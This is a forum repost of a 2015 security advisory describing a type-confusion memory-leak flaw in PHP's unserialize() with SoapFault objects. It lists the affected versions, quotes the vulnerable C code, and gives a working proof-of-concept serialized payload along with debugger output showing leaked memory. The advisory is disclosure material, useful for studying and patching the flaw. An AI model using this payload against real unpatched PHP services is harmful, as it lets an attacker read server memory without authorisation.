Jump to content
Aerosol

PHP SoapFault Type Confusion

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

# Type Confusion Infoleak Vulnerability in unserialize() with SoapFault

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1
- Release Date: 2015.4.28

> A type confusion vulnerability was discovered in unserialize() with SoapFault object's __toString() magic method that can be abused for leaking arbitrary memory blocks.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.8
Affected is PHP 5.5 < 5.5.24
Affected is PHP 5.4 < 5.4.40
Affected is PHP 5.3 <= 5.3.29

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
PHP_METHOD(SoapFault, __toString)
{
...
  faultcode   = zend_read_property(soap_fault_class_entry, this_ptr,
"faultcode", sizeof("faultcode")-1, 1 TSRMLS_CC);
  faultstring = zend_read_property(soap_fault_class_entry, this_ptr,
"faultstring", sizeof("faultstring")-1, 1 TSRMLS_CC);
  file = zend_read_property(soap_fault_class_entry, this_ptr, "file",
sizeof("file")-1, 1 TSRMLS_CC);
  line = zend_read_property(soap_fault_class_entry, this_ptr, "line",
sizeof("line")-1, 1 TSRMLS_CC);
...
  len = spprintf(&str, 0, "SoapFault exception: [%s] %s in
%s:%ld\nStack trace:\n%s",
                 Z_STRVAL_P(faultcode), Z_STRVAL_P(faultstring),
Z_STRVAL_P(file), Z_LVAL_P(line),
                 Z_STRLEN_P(trace) ? Z_STRVAL_P(trace) : "#0 {main}\n");

  zval_ptr_dtor(&trace);

  RETURN_STRINGL(str, len, 0);
}
```

The Z_STRVAL_P macro lead to looking up an arbitrary valid memory
address, and return a string via a integer-type zval that start from
this memory address. If the memory address is an invalid memory
position, it should result in a crash.
The Z_LVAL_P macro lead to leaking memory address via a string-type
zval that this string value stored.

Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.

```
<?php

$data = 'O:9:"SoapFault":4:{s:9:"faultcode";i:4298448493;s:11:"faultstring";i:4298448543;s:7:"'."\0*\0".'file";i:4298447319;s:7:"'."\0*\0".'line";s:4:"ryat";}';
echo unserialize($data);

?>
```

Test the PoC on the command line, then output some memory blocks and
memory address:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run test.php
SoapFault exception: [UH??AWAVSPI??I??H????
 in UH??AWAVAUATSH???:4307253992           ] UH??SPD???*?????t"H?
Stack trace:
#0 test.php(4): unserialize('O:9:"SoapFault"...')
#1 {main}
Process 889 exited with status = 0 (0x00000000)

Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...